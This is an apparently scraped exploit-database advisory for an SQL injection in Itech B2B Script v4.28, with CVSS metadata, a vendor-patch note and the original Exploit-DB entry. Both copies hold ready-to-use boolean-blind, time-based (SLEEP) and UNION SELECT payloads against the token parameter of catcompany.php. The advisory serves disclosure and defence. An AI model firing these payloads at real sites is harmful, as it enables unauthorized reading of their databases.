Itech B2B Script v4.28 – SQL Injection

vendor:

B2B Script

by:

Kaan KAMIS

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: B2B Script

Affected Version From: 4.28

Affected Version To: 4.28

Patch Exists: YES

Related CWE: N/A

CPE: a:itechscripts:b2b_script:4.28

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

Itech B2B Script v4.28 – SQL Injection

An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read arbitrary data from the database. URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload] Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA ---

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

Exploit Title: Itech B2B Script v4.28 – SQL Injection
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/b2b-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits

Overview

B2B Script v4.28 is a versatile web solution for the webmasters who are willing to launch their own B2B Portal within a few minutes.

Type of vulnerability:

An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read
arbitrary data from the database.

Vulnerability:

URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload]

Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA ---